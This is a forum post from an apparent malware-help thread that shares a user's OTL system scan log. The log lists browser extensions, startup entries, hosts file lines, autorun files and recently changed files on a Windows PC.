[2014.11.11 00:49:23 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions
[2014.11.11 00:49:31 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
[2014.12.09 13:44:26 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\updated\browser\extensions
[2014.12.09 13:44:37 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\updated\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}

chvostik
Visitor
Posts: 31
Registered: 04 Apr 2008 17:37

Re: Malware - please check my log

#5 Post by chvostik »

========== Chrome ==========

CHR - default_search_provider: (Enabled)
CHR - default_search_provider: search_url =
CHR - default_search_provider: suggest_url =
CHR - homepage: http://mysearch.avg.com?cid={6D884549-F ... 2014-05-19 20:03:06&v=18.1.0.443&pid=safeguard&sg=&sap=hp
CHR - plugin: Shockwave Flash (Enabled) = C:\Program Files (x86)\Google\Chrome\Application\36.0.1985.143\PepperFlash\pepflashplayer.dll
CHR - plugin: Chrome Remote Desktop Viewer (Enabled) = internal-remoting-viewer
CHR - plugin: Native Client (Enabled) = C:\Program Files (x86)\Google\Chrome\Application\36.0.1985.143\ppGoogleNaClPluginChrome.dll
CHR - plugin: Chrome PDF Viewer (Enabled) = C:\Program Files (x86)\Google\Chrome\Application\36.0.1985.143\pdf.dll
CHR - plugin: Adobe Acrobat (Enabled) = C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll
CHR - plugin: Google Update (Enabled) = C:\Program Files (x86)\Google\Update\1.3.21.153\npGoogleUpdate3.dll
CHR - plugin: Java(TM) Platform SE 7 U21 (Enabled) = C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll
CHR - plugin: NVIDIA 3D Vision (Enabled) = C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll
CHR - plugin: NVIDIA 3D VISION (Enabled) = C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll
CHR - plugin: Pando Web Plugin (Enabled) = C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll
CHR - plugin: Shockwave Flash (Enabled) = C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_8_800_168.dll
CHR - plugin: Java Deployment Toolkit 7.0.210.11 (Enabled) = C:\Windows\SysWOW64\npDeployJava1.dll
CHR - Extension: Dokumenty Google = C:\Users\Lobo\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\
CHR - Extension: Disk Google = C:\Users\Lobo\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\
CHR - Extension: Validity = C:\Users\Lobo\AppData\Local\Google\Chrome\User Data\Default\Extensions\bbicmjjbohdfglopkidebfccilipgeif\130\
CHR - Extension: YouTube = C:\Users\Lobo\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\
CHR - Extension: Vyhledávání Google = C:\Users\Lobo\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\
CHR - Extension: No name found = C:\Users\Lobo\AppData\Local\Google\Chrome\User Data\Default\Extensions\gpfhbllmiipcmgbdlmehpipicmijimke\3.9\
CHR - Extension: Peněženka Google = C:\Users\Lobo\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\
CHR - Extension: Gmail = C:\Users\Lobo\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\

O1 HOSTS File: ([2014.02.25 16:32:46 | 000,000,923 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O1 - Hosts: 127.0.0.1 genuine.microsoft.com
O1 - Hosts: 127.0.0.1 mpa.one.microsoft.com
O1 - Hosts: 127.0.0.1 sls.microsoft.com
O2 - BHO: (Java(tm) Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2 - BHO: (QIPBHO Class) - {95289393-33EA-4F8D-B952-483415B9C955} - C:\Users\Lobo\AppData\Roaming\Microsoft\Internet Explorer\qipsearchbar.dll (qip.ru)
O2 - BHO: (no name) - {95B7759C-8C7F-4BF1-B163-73684A933233} - No CLSID value found.
O2 - BHO: (Java(tm) Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O4:64bit: - HKLM..\Run: [egui] C:\Program Files\ESET\ESET Smart Security\egui.exe (ESET)
O4:64bit: - HKLM..\Run: [RtHDVCpl] C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe (Realtek Semiconductor)
O4 - HKLM..\Run: [] File not found
O4 - HKLM..\Run: [APSDaemon] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.)
O4 - HKLM..\Run: [ZoneAlarm] C:\Program Files (x86)\CheckPoint\ZoneAlarm\zatray.exe (Check Point Software Technologies Ltd.)
O4 - HKU\S-1-5-19..\Run: [Sidebar] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe (Microsoft Corporation)
O4 - HKU\S-1-5-20..\Run: [Sidebar] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe (Microsoft Corporation)
O4 - HKU\S-1-5-21-2861910011-920187971-3878467655-1000..\Run: [DAEMON Tools Lite] C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe (Disc Soft Ltd)
O4 - HKU\S-1-5-21-2861910011-920187971-3878467655-1000..\Run: [GoogleDriveSync] C:\Program Files (x86)\Google\Drive\googledrivesync.exe (Google)
O4 - HKU\S-1-5-21-2861910011-920187971-3878467655-1001..\Run: [Sidebar] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe (Microsoft Corporation)
O4 - HKU\S-1-5-19..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found
O4 - HKU\S-1-5-20..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found
O4 - HKU\S-1-5-21-2861910011-920187971-3878467655-1001..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableLUA = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: PromptOnSecureDesktop = 0
O7 - HKU\S-1-5-21-2861910011-920187971-3878467655-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoLogoff = 0
O7 - HKU\S-1-5-21-2861910011-920187971-3878467655-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoClose = 0
O7 - HKU\S-1-5-21-2861910011-920187971-3878467655-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: DisableLockWorkstation = 0
O7 - HKU\S-1-5-21-2861910011-920187971-3878467655-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: DisableChangePassword = 0
O8:64bit: - Extra context menu item: Download with GetRight - C:\Program Files (x86)\GetRight\GRDownload.htm ()
O8:64bit: - Extra context menu item: Open with GetRight Browser - C:\Program Files (x86)\GetRight\GRBrowse.htm ()
O8 - Extra context menu item: Download with GetRight - C:\Program Files (x86)\GetRight\GRDownload.htm ()
O8 - Extra context menu item: Open with GetRight Browser - C:\Program Files (x86)\GetRight\GRBrowse.htm ()
O1364bit: - gopher Prefix: missing
O13 - gopher Prefix: missing
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 10.10.10.1 192.168.1.254
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{2EFE5CB0-CB8F-49F6-93A4-AA75FEB7B609}: DhcpNameServer = 10.10.10.1 192.168.1.254
O18:64bit: - Protocol\Handler\msdaipp - No CLSID value found
O18:64bit: - Protocol\Handler\msdaipp\0x00000001 - No CLSID value found
O18:64bit: - Protocol\Handler\msdaipp\oledb - No CLSID value found
O18:64bit: - Protocol\Handler\ms-help - No CLSID value found
O18:64bit: - Protocol\Handler\ms-itss - No CLSID value found
O18:64bit: - Protocol\Handler\mso-offdap11 - No CLSID value found
O18 - Protocol\Handler\msdaipp\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\msdaipp\oledb {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18:64bit: - Protocol\Filter\text/xml - No CLSID value found
O20:64bit: - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20:64bit: - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\Windows\SysWow64\userinit.exe (Microsoft Corporation)
O21:64bit: - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2014.12.09 13:42:19 | 000,086,842 | ---- | M] () - C:\autoupdate.log -- [ NTFS ]
O32 - AutoRun File - [2007.08.08 14:14:09 | 000,000,000 | ---- | M] () - F:\AUTOEXEC.BAT -- [ NTFS ]
O32 - AutoRun File - [2009.07.14 18:48:15 | 000,000,122 | R--- | M] () - G:\autorun.inf -- [ UDF ]
O32 - AutoRun File - [2007.11.08 06:44:04 | 000,054,272 | R--- | M] (Microsoft Corporation) - H:\autorun.exe -- [ UDF ]
O32 - AutoRun File - [2003.07.24 02:26:21 | 000,000,048 | R--- | M] () - H:\autorun.inf -- [ UDF ]
O33 - MountPoints2\{04677141-a8f2-11e2-9a94-806e6f6e6963}\Shell - "" = AutoRun
O33 - MountPoints2\{04677141-a8f2-11e2-9a94-806e6f6e6963}\Shell\AutoRun\command - "" = G:\setup.exe -- [2009.07.14 18:48:15 | 000,106,760 | R--- | M] (Microsoft Corporation)
O33 - MountPoints2\{36bebec4-ae49-11e2-b84f-1c6f65ae4f4a}\Shell - "" = AutoRun
O33 - MountPoints2\{36bebec4-ae49-11e2-b84f-1c6f65ae4f4a}\Shell\AutoRun\command - "" = H:\autorun.exe -- [2007.11.08 06:44:04 | 000,054,272 | R--- | M] (Microsoft Corporation)
O34 - HKLM BootExecute: (autocheck autochk *)
O35:64bit: - HKLM\..comfile [open] -- "%1" %*
O35:64bit: - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:64bit: - HKLM\...com [@ = comfile] -- "%1" %*
O37:64bit: - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)

CREATERESTOREPOINT
Restore point Set: OTL Restore Point

NetSvcs:64bit: AppMgmt - C:\Windows\SysNative\appmgmts.dll (Microsoft Corporation)

Drivers32:64bit: msacm.l3acm - C:\Windows\System32\l3codeca.acm (Fraunhofer Institut Integrierte Schaltungen IIS)
Drivers32:64bit: VIDC.FPS1 - frapsv64.dll (Beepa P/L)
Drivers32: msacm.l3acm - C:\Windows\SysWOW64\l3codeca.acm (Fraunhofer Institut Integrierte Schaltungen IIS)
Drivers32: vidc.cvid - C:\Windows\SysWow64\iccvid.dll (Radius Inc.)
Drivers32: VIDC.FMVC - C:\Windows\SysWow64\fmcodec.DLL (Fox Magic Software)
Drivers32: VIDC.FPS1 - C:\Windows\SysWow64\frapsvid.dll (Beepa P/L)
PhysicalDisk0 MBR saved to C:\PhysicalMBR.bin

========== Files/Folders - Created Within 7 Days ==========

[2014.12.09 17:30:53 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\Lobo\Desktop\OTL.exe
[2014.12.09 16:36:56 | 000,000,000 | ---D | C] -- C:\Program Files\trend micro
[2014.12.09 16:36:55 | 000,000,000 | ---D | C] -- C:\rsit
[2014.12.09 08:41:36 | 007,717,984 | ---- | C] (Kaspersky Lab ZAO) -- C:\Windows\SysNative\drivers\kl1.sys
[2014.12.09 08:41:34 | 000,490,592 | ---- | C] (Kaspersky Lab ZAO) -- C:\Windows\SysNative\drivers\klif.sys
[2014.12.09 08:41:34 | 000,092,768 | ---- | C] (Kaspersky Lab ZAO) -- C:\Windows\SysNative\drivers\klflt.sys
[2014.12.09 08:41:34 | 000,000,000 | ---D | C] -- C:\Windows\SysNative\DRVSTORE
[2014.12.09 08:12:09 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Check Point
[2014.12.09 08:11:58 | 000,374,664 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\drivers\netio.sys
[2014.12.09 07:50:59 | 000,129,752 | ---- | C] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\MBAMSwissArmy.sys
[2014.12.09 07:50:40 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
[2014.12.09 07:50:37 | 000,093,400 | ---- | C] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\mbamchameleon.sys
[2014.12.09 07:50:37 | 000,063,704 | ---- | C] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\mwac.sys
[2014.12.09 07:50:37 | 000,025,816 | ---- | C] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\mbam.sys
[2014.12.09 07:50:37 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Malwarebytes Anti-Malware
[2014.12.09 07:50:37 | 000,000,000 | ---D | C] -- C:\ProgramData\Malwarebytes
[2014.12.08 23:30:06 | 000,000,000 | ---D | C] -- C:\1470d06be47cb175c79779ff1f
[2014.12.08 11:39:47 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Microsoft ASP.NET
[2014.12.07 21:13:51 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MySQL
[2014.12.07 21:13:51 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\MySQL
[2014.12.07 12:42:04 | 000,000,000 | ---D | C] -- C:\Program Files\Microsoft SDKs
[2014.12.07 12:41:12 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Visual Studio 2008
[2014.12.07 12:40:29 | 000,000,000 | ---D | C] -- C:\ProgramData\PreEmptive Solutions
[2014.12.06 16:39:55 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\CE Remote Tools
[2014.12.06 16:39:51 | 000,000,000 | -HSD | C] -- C:\Config.Msi
[2014.12.06 16:39:02 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Microsoft Web Designer Tools
[2014.12.06 16:38:50 | 000,000,000 | RH-D | C] -- C:\MSOCache
[2014.12.06 10:37:25 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Check Point Software Technologies LTD
[2014.12.06 10:36:53 | 000,000,000 | ---D | C] -- C:\Users\Lobo\AppData\Roaming\Check Point Software Technologies LTD
[2014.12.06 10:36:49 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\CheckPoint
[2014.12.06 10:34:43 | 000,000,000 | ---D | C] -- C:\ProgramData\CheckPoint
[2 C:\Users\Lobo\Documents\*.tmp files -> C:\Users\Lobo\Documents\*.tmp -> ]
[1 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]

========== Files - Modified Within 7 Days ==========

[2014.12.09 17:36:27 | 000,000,512 | ---- | M] () -- C:\PhysicalMBR.bin
[2014.12.09 17:30:53 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Lobo\Desktop\OTL.exe
[2014.12.09 17:14:02 | 000,000,914 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2014.12.09 17:13:50 | 000,052,432 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[2014.12.09 17:13:50 | 000,052,432 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[2014.12.09 17:05:59 | 000,129,752 | ---- | M] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\MBAMSwissArmy.sys
[2014.12.09 16:48:00 | 000,000,952 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA1cf6ab1eb08fd0f.job
[2014.12.09 13:47:42 | 000,724,398 | ---- | M] () -- C:\Windows\SysNative\perfh005.dat
[2014.12.09 13:47:42 | 000,709,964 | ---- | M] () -- C:\Windows\SysNative\perfh009.dat
[2014.12.09 13:47:42 | 000,162,428 | ---- | M] () -- C:\Windows\SysNative\perfc005.dat
[2014.12.09 13:47:42 | 000,143,218 | ---- | M] () -- C:\Windows\SysNative\perfc009.dat
[2014.12.09 13:47:41 | 001,741,822 | ---- | M] () -- C:\Windows\SysNative\PerfStringBackup.INI
[2014.12.09 13:42:07 | 000,000,948 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore1cf8c5b584a0b82.job
[2014.12.09 13:41:34 | 000,025,640 | ---- | M] (Windows (R) Server 2003 DDK provider) -- C:\Windows\gdrv.sys
[2014.12.09 13:41:29 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2014.12.09 13:41:28 | 3219,300,352 | -HS- | M] () -- C:\hiberfil.sys
[2014.12.09 08:37:24 | 000,000,000 | ---- | M] () -- C:\Windows\SysNative\drivers\etc\lmhosts
[2014.12.09 08:12:26 | 000,431,395 | ---- | M] () -- C:\Windows\SysNative\drivers\vsconfig.xml
[2014.12.09 08:12:09 | 000,000,762 | ---- | M] () -- C:\Users\Public\Desktop\ZoneAlarm Security.lnk
[2014.12.09 07:51:53 | 000,001,102 | ---- | M] () -- C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
[2014.12.08 23:50:04 | 000,007,607 | ---- | M] () -- C:\Users\Lobo\AppData\Local\resmon.resmoncfg
[2014.12.07 21:13:55 | 001,765,988 | ---- | M] () -- C:\Windows\SysWow64\PerfStringBackup.INI
[2014.12.07 21:06:35 | 000,368,112 | ---- | M] () -- C:\Windows\SysNative\FNTCACHE.DAT
[2 C:\Users\Lobo\Documents\*.tmp files -> C:\Users\Lobo\Documents\*.tmp -> ]
[1 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]

========== Files Created - No Company Name ==========

[2014.12.09 17:36:27 | 000,000,512 | ---- | C] () -- C:\PhysicalMBR.bin
[2014.12.09 08:12:15 | 000,431,395 | ---- | C] () -- C:\Windows\SysNative\drivers\vsconfig.xml
[2014.12.09 08:12:09 | 000,000,762 | ---- | C] () -- C:\Users\Public\Desktop\ZoneAlarm Security.lnk
[2014.12.09 07:50:41 | 000,001,102 | ---- | C] () -- C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
[2014.11.11 18:36:42 | 000,538,126 | --S- | C] () -- C:\Windows\SysWow64\libcurl-4.dll
[2014.11.11 18:36:42 | 000,192,512 | --S- | C] () -- C:\Windows\SysWow64\libidn-11.dll
[2014.11.11 18:36:42 | 000,133,632 | --S- | C] () -- C:\Windows\SysWow64\librtmp.dll
[2014.11.11 18:36:42 | 000,100,864 | --S- | C] () -- C:\Windows\SysWow64\zlib1.dll
[2014.11.03 20:01:53 | 000,000,016 | ---- | C] () -- C:\Windows\SysWow64\msvcsv60.dll
[2014.11.03 20:01:53 | 000,000,016 | ---- | C] () -- C:\Users\Lobo\AppData\Roaming\msregsvv.dll
[2014.11.03 20:01:53 | 000,000,016 | ---- | C] () -- C:\Windows\msocreg32.dat
[2014.11.03 20:01:53 | 000,000,016 | ---- | C] () -- C:\ProgramData\autobk.inc
[2014.10.17 19:40:30 | 000,002,135 | ---- | C] () -- C:\Users\Lobo\.recently-used.xbel
[2014.09.02 11:03:15 | 000,000,406 | RHS- | C] () -- C:\ProgramData\ntuser.pol
[2014.04.28 20:12:05 | 000,004,096 | -H-- | C] () -- C:\Users\Lobo\AppData\Local\keyfile3.drm
[2014.04.24 16:58:22 | 000,003,584 | ---- | C] () -- C:\Users\Lobo\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2014.01.07 16:32:33 | 000,000,000 | ---- | C] () -- C:\Windows\aaLicView.INI
[2013.05.03 17:25:13 | 001,765,988 | ---- | C] () -- C:\Windows\SysWow64\PerfStringBackup.INI
[2013.04.20 20:20:53 | 000,000,528 | ---- | C] () -- C:\Windows\ODBC.INI
[2013.04.19 20:47:51 | 000,007,607 | ---- | C] () -- C:\Users\Lobo\AppData\Local\resmon.resmoncfg
[2013.04.19 14:59:05 | 000,178,688 | ---- | C] () -- C:\Windows\SysWow64\unrar.dll
[2013.04.19 14:29:14 | 000,030,528 | ---- | C] () -- C:\Windows\GVTDrv64.sys
[2013.04.19 14:15:37 | 000,000,010 | ---- | C] () -- C:\Windows\GSetup.ini

========== ZeroAccess Check ==========

[2009.07.14 05:55:00 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini

[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2009.07.14 02:41:54 | 014,161,920 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2009.07.14 02:16:14 | 012,866,560 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009.07.14 02:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2009.07.14 02:15:20 | 000,605,696 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009.07.14 02:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]

========== LOP Check ==========

[2014.10.22 17:33:04 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Audacity
[2014.04.02 10:28:32 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\AVG
[2014.01.17 13:39:39 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Battle.net
[2013.04.27 18:06:13 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\BSplayer
[2013.04.19 15:00:12 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\BSplayer Pro
[2014.12.06 10:37:14 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Check Point Software Technologies LTD
[2013.04.26 10:04:43 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\DAEMON Tools Lite
[2014.04.02 10:27:50 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\DVDVideoSoft
[2014.11.10 22:52:18 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\e-academy Inc
[2013.04.23 15:44:47 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\ESET
[2014.01.13 19:38:22 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\GetRight
[2014.10.06 10:22:09 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\GHISLER
[2014.09.23 09:18:11 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\gtk-2.0
[2014.11.03 20:02:03 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\IK Multimedia
[2014.05.15 17:04:37 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\PDF Architect
[2014.05.15 17:02:19 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\pdfforge
[2014.06.22 11:08:40 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Publish Providers
[2013.04.19 15:05:20 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\QIP
[2014.11.03 20:23:51 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\REAPER
[2013.07.05 22:29:22 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Riot Games
[2013.05.25 22:13:14 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Shifters Anticheat
[2013.06.17 20:23:56 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Softland
[2014.07.01 10:52:51 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Sony
[2014.06.24 16:05:17 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Sublime Text 3
[2014.11.26 22:35:10 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\TS3Client
[2014.01.13 19:34:53 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\Unity
[2013.06.28 11:03:20 | 000,000,000 | ---D | M] -- C:\Users\Lobo\AppData\Roaming\VitySoft

========== Purity Check ==========



========== Custom Scans ==========

< >
[2009.07.14 06:08:49 | 000,000,006 | -H-- | C] () -- C:\Windows\Tasks\SA.DAT
[2009.07.14 06:08:49 | 000,032,582 | ---- | C] () -- C:\Windows\Tasks\SCHEDLGU.TXT
[2013.04.19 14:58:04 | 000,000,914 | ---- | C] () -- C:\Windows\Tasks\Adobe Flash Player Updater.job
[2014.05.08 12:37:40 | 000,000,952 | ---- | C] () -- C:\Windows\Tasks\GoogleUpdateTaskMachineUA1cf6ab1eb08fd0f.job
[2014.06.20 08:43:36 | 000,000,948 | ---- | C] () -- C:\Windows\Tasks\GoogleUpdateTaskMachineCore1cf8c5b584a0b82.job

< >

< MD5 for: ATAPI.SYS >
[2009.07.14 02:52:21 | 000,024,128 | ---- | M] (Microsoft Corporation) MD5=02062C0B390B7729EDC9E69C680A6F3C -- C:\Windows\SysNative\drivers\atapi.sys
[2009.07.14 02:52:21 | 000,024,128 | ---- | M] (Microsoft Corporation) MD5=02062C0B390B7729EDC9E69C680A6F3C -- C:\Windows\SysNative\DriverStore\FileRepository\mshdc.inf_amd64_neutral_a69a58a4286f0b22\atapi.sys
[2009.07.14 02:52:21 | 000,024,128 | ---- | M] (Microsoft Corporation) MD5=02062C0B390B7729EDC9E69C680A6F3C -- C:\Windows\winsxs\amd64_mshdc.inf_31bf3856ad364e35_6.1.7600.16385_none_392d19c13b3ad543\atapi.sys

< MD5 for: AUTOCHK.EXE >
[2009.07.14 02:14:12 | 000,668,160 | ---- | M] (Microsoft Corporation) MD5=41E4C8EBA464E7D6A5BA5E8827732AEB -- C:\Windows\SysWOW64\autochk.exe
